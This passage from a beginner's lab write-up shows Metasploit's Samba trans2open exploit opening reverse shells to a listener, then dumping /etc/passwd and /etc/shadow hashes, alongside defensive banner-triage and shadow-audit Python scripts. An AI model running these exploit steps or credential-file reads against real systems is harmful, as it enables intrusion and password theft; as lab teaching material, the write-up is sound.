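        if "affected_series" in rule and in_series(version, rule["affected_series"]):
            findings.append(f"{rule['name']} {version} is in the affected {rule['affected_series']}.x series")
    return findings


def triage(banners):
    """Map port -> findings, keeping only ports with at least one match."""
    result = {}
    for port, banner in banners.items():
        hits = check_banner(banner)
        if hits:
            result[port] = hits
    return result


if __name__ == "__main__":
    for port, hits in triage(SAMPLE_BANNERS).items():
        for hit in hits:
            print(port, hit)
```

The rule table is the part to extend: each entry carries either a `fixed_in` release or an `affected_series`, and adding a product is one dictionary rather than another ad-hoc string comparison.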

3. Port 22

We google the service version for this port and come up with this exploit.

EXPLOITATION

Right now we have 3 possible exploits, and I strongly feel that each of them will work against our target, since the machine was made to be exploited.

For this attempt, let’s use the Samba trans2open exploit; we’ll save the other exploits for another day.

Exploit “trans2open” using Metasploit

msf5 > search trans2open

Matching Modules
================

   #  Name                               Disclosure Date  Rank   Check  Description
   -  ----                               ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open   2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open     2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open       2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open   2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index, for example use 3 or use exploit/solaris/samba/trans2open

msf5 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.9      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.1.9:4444
[*] 192.168.1.104:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffafc...
[*] Sending stage (980808 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.9:4444 -> 192.168.1.104:1025) at 2020-09-03 10:48:53 -0400
[*] 192.168.1.104 - Meterpreter session 1 closed. Reason: Died
[*] 192.168.1.104:139 - Trying return address 0xbffff9fc...
[*] Sending stage (980808 bytes) to 192.168.1.104
[*] 192.168.1.104 - Meterpreter session 2 closed. Reason: Died
[*] Meterpreter session 2 opened (192.168.1.9:4444 -> 127.0.0.1) at 2020-09-03 10:48:54 -0400
[*] 192.168.1.104:139 - Trying return address 0xbffff8fc...
[*] Sending stage (980808 bytes) to 192.168.1.104
[*] Meterpreter session 3 opened (192.168.1.9:4444 -> 192.168.1.104:1027) at 2020-09-03 10:48:55 -0400
^C[-] 192.168.1.104:139 - Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(linux/samba/trans2open) > [*] 192.168.1.104 - Meterpreter session 3 closed. Reason: Died

Notice that Metasploit assigns a default payload to every module we open. The one we got here (linux/x86/meterpreter/reverse_tcp) is a staged payload, and the resulting Meterpreter session was intermittent and kept disconnecting.

CHANGED THE PAYLOAD FROM STAGED TO NON-STAGED

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 192.168.1.9:4444
[*] 192.168.1.104:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffafc...
[*] Command shell session 4 opened (192.168.1.9:4444 -> 192.168.1.104:1028) at 2020-09-03 10:49:40 -0400

whoami
root
pwd
/tmp
less /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
less /etc/shadow
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::
sync:*:14513:0:99999:7:::
shutdown:*:14513:0:99999:7:::
halt:*:14513:0:99999:7:::
mail:*:14513:0:99999:7:::
news:*:14513:0:99999:7:::
uucp:*:14513:0:99999:7:::
operator:*:14513:0:99999:7:::
games:*:14513:0:99999:7:::
gopher:*:14513:0:99999:7:::
ftp:*:14513:0:99999:7:::
nobody:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
rpm:!!:14513:0:99999:7:::
xfs:!!:14513:0:99999:7:::
rpc:!!:14513:0:99999:7:::
rpcuser:!!:14513:0:99999:7:::
nfsnobody:!!:14513:0:99999:7:::
nscd:!!:14513:0:99999:7:::
ident:!!:14513:0:99999:7:::
radvd:!!:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
squid:!!:14513:0:99999:7:::
pcap:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::

And we got ROOT!

We got a shell with root access and were able to read and dump the /etc/passwd and /etc/shadow files; from here we can try password cracking to recover the user and root passwords.
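Reading /etc/shadow is also where a defender’s checklist starts: which accounts can actually log in interactively, which hashes use an outdated algorithm (the $1$ prefix seen above is MD5-crypt), and which passwords never expire. As an added example (my code, not from the post), here is a Python audit that joins passwd and shadow entries and reports those conditions, so the same dump that an attacker would feed to a cracker tells an administrator which accounts to rotate first. The sample entries are constructed in the format of the dumps above; the salts and hashes are placeholders, not real credentials.

```python
# Constructed sample entries in /etc/passwd and /etc/shadow format. The salts
# and hashes are placeholders, not real credentials.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$1$PLACEHOLD$PLACEHOLDERHASHVALUE0000000:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
john:$1$PLACEHOLD$PLACEHOLDERHASHVALUE0000001:14513:0:99999:7:::
harold:$6$PLACEHOLD$PLACEHOLDERHASHVALUE0000002:14513:0:90:7:::
"""

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/nologin", "/bin/false", "/dev/null"}

# crypt(3) prefix -> algorithm name; MD5-crypt is the one to retire first.
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                 "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
WEAK_ALGORITHMS = {"md5crypt"}


def parse_passwd(text):
    """Map user name -> {uid, shell} from passwd-format lines."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        users[fields[0]] = {"uid": int(fields[2]), "shell": fields[6]}
    return users


def parse_shadow(text):
    """Map user name -> {hash, max_days} from shadow-format lines."""
    entries = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 5:
            continue
        max_days = int(fields[4]) if fields[4] else None
        entries[fields[0]] = {"hash": fields[1], "max_days": max_days}
    return entries


def classify_hash(value):
    """Return 'empty', 'locked', an algorithm name, or 'unknown'."""
    if value == "":
        return "empty"
    if value.startswith(("*", "!")):
        return "locked"
    for prefix, name in HASH_PREFIXES.items():
        if value.startswith(prefix):
            return name
    return "unknown"


def audit(passwd_text, shadow_text):
    """Return a sorted list of (user, issue) findings."""
    users = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    findings = []
    for name, user in users.items():
        entry = shadow.get(name)
        if entry is None:
            findings.append((name, "no shadow entry"))
            continue
        algo = classify_hash(entry["hash"])
        interactive = user["shell"] not in NOLOGIN_SHELLS
        if user["uid"] == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if algo == "empty" and interactive:
            findings.append((name, "empty password on interactive account"))
        if algo in WEAK_ALGORITHMS:
            findings.append((name, f"weak hash algorithm {algo}"))
        never_expires = entry["max_days"] is None or entry["max_days"] >= 99999
        if interactive and algo not in ("empty", "locked") and never_expires:
            findings.append((name, "login-capable account whose password never expires"))
    return sorted(findings)


def login_capable(passwd_text, shadow_text):
    """Users with an interactive shell and an unlocked, non-empty password hash."""
    users = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    return sorted(name for name, user in users.items()
                  if user["shell"] not in NOLOGIN_SHELLS
                  and name in shadow
                  and classify_hash(shadow[name]["hash"]) not in ("empty", "locked", "unknown"))


if __name__ == "__main__":
    for user, issue in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{user:10} {issue}")
    print("login-capable:", ", ".join(login_capable(PASSWD_SAMPLE, SHADOW_SAMPLE)))
```

On the sample, root and john are flagged for MD5-crypt and for passwords that never expire, harold (sha512crypt, 90-day maximum) is clean, and the login-capable set is harold, john and root; the locked service accounts drop out even where they keep /bin/bash as their shell.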

There’s a lot I learned from this machine. Since I am just a beginning student of infosec, I really enjoyed it; although it was easy and boring for our hacking heroes, I enjoyed the enumeration part, where I got to have more than one possible exploit. I also learned about staged and stageless payloads in Metasploit, and although Metasploit is discouraged among OSCP takers, I am slowly learning my way around manual exploits and will post my manual hacking in the future.

Feel free to add pointers, methodology or anything I missed; I would be really glad to add more to my arsenal as I prepare for the OSCP. Also please point out anything I did wrong or anything I can improve upon.

Alright! ;)
